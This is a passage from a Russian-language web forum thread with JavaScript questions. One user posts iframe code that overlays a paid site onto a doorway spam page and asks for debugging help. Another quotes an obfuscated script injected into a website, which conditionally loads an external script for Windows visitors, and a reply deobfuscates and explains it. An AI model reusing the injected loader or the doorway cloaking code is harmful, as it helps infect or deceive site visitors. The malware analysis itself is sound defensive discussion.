Старый 22.02.2013, 11:35   #61
zuzzz
 
Регистрация: 24.02.2011
Сообщений: 75
Репутация: 7
По умолчанию

Marcus Britannus, а зачем ты вставил "return false;" Убери её совсем и должно заработать.
Всё, что после return просто не выполняется.
zuzzz вне форума   Ответить с цитированием
Старый 22.02.2013, 15:25   #62
Marcus Britannus
 
Регистрация: 06.02.2013
Сообщений: 2
Репутация: 0
По умолчанию

zuzzz, так в Firefox только код выполняется (и то, быть может, не во всех версиях), а вот IE ошибочным код без "return false;" считает и впридачу к саботированию getjson перестает выполнять функцию encode (если не весь прочий javascript код страницы).
Marcus Britannus вне форума   Ответить с цитированием
Старый 09.04.2013, 07:11   #63
-Gory King-
 
Аватар для -Gory King-
 
Регистрация: 25.07.2010
Сообщений: 36
Репутация: 4
Post Небольшая проблемка

Можна ли достать отсюда пароль для входа?Или же узнать его место хранения.
Заранее спасибо


http://upwap.ru/3075161
-Gory King- вне форума   Ответить с цитированием
Старый 10.04.2013, 02:24   #64
profexer
 
Регистрация: 06.01.2011
Сообщений: 117
Репутация: 63
По умолчанию

Отсюда нет.
В преложенном файле только используются введенные данные в поля username и userpwd для формирования xml-запроса на авторизацию (кстати не проверял на XXE?).
profexer вне форума   Ответить с цитированием
Старый 28.06.2013, 19:48   #65
shuba
 
Аватар для shuba
 
Регистрация: 05.07.2010
Сообщений: 104
Репутация: 5
По умолчанию

Такая проблема, фреймю джава скриптом дор

Цитата:


var link = '';

switch (window.location.host)
{


case 'domen.com/images/stats':
case 'www.domen.com/images/stats':
link = 'http://platnik.ru/';
break;
default:
link = 'http://google.com';
break;
}

$('#document-body').css('padding-top', 0);

$('#document-body').html(

'<iframe style="border: 0; position: fixed; top: 0; left: 0; right: 0; bottom: 0; width: 100%; height: 100%" frameborder="0" marginheight="0px" marginwidth="0px" src="' + link + '" height="100%" width="100%"></iframe>'
);
когда дор в подпапке, то фрейм не работает. Когда дор просто на домене "case 'domen.com':"сайт link = 'http://platnik.ru/'; прописанный здесь накладывается на дор . Как решить проблемы, что бы с подпапками работало?
shuba вне форума   Ответить с цитированием
Старый 04.07.2013, 08:31   #66
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от shuba Посмотреть сообщение
когда дор в подпапке, то фрейм не работает.
У вас в коде используется JQuery, вероятно пути к нему идут относительные, и когда вы помещаете его в каталог он не подгружается.
NameSpace вне форума   Ответить с цитированием
Старый 09.12.2015, 15:35   #67
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

На одном из сайтов обнаружил такой код:

Код HTML:
var script=document.createElement('script');script.src='http://site.com';bindEvent(function(){if((document.cookie.indexOf('__utns=')==-1)&&(navigator.userAgent.indexOf('Windows')!=-1)){if(document.referrer.length>5){document.getElementsByTagName('body')[0].appendChild(script)}}var a=new Date();a.setTime(a.getTime()+432000000);document.cookie='__utns=yes; path=/; expires='+a});function bindEvent(a){window[((window[($aEL='addEventListener')])?($aEL):('attachEvent'))](((window[$aEL])?(''):('on'))+'load',a,((window[$aEL])?(!1):(null)))};
Я вообще не разбираюсь в js, объясните, пожалуйста, что этот код делает. Если можно, в подробностях.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 10.12.2015, 02:08   #68
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Если юзер на Windows, есть рефер и нет куки "__utns", то подгружает скрипт "http://site.com". Всем ставит куку "__utns=yes".

PHP код:
var script document.createElement('script');
script.src 'http://site.com';
bindEvent(function() {
    if ((
document.cookie.indexOf('__utns=') == -1) && (navigator.userAgent.indexOf('Windows') != -1)) {
        if (
document.referrer.length 5) {
            
document.getElementsByTagName('body')[0].appendChild(script)
        }
    }
    var 
= new Date();
    
a.setTime(a.getTime() + 432000000);
    
document.cookie '__utns=yes; path=/; expires=' a
});

function 
bindEvent(a) {
    
window[((window[($aEL 'addEventListener')]) ? ($aEL) : ('attachEvent'))](((window[$aEL]) ? ('') : ('on')) + 'load'a, ((window[$aEL]) ? (!1) : (null)))
}; 
Используй http://jsbeautifier.org/, читать будет удобнее.

Последний раз редактировалось crlf; 10.12.2015 в 02:15..
crlf вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot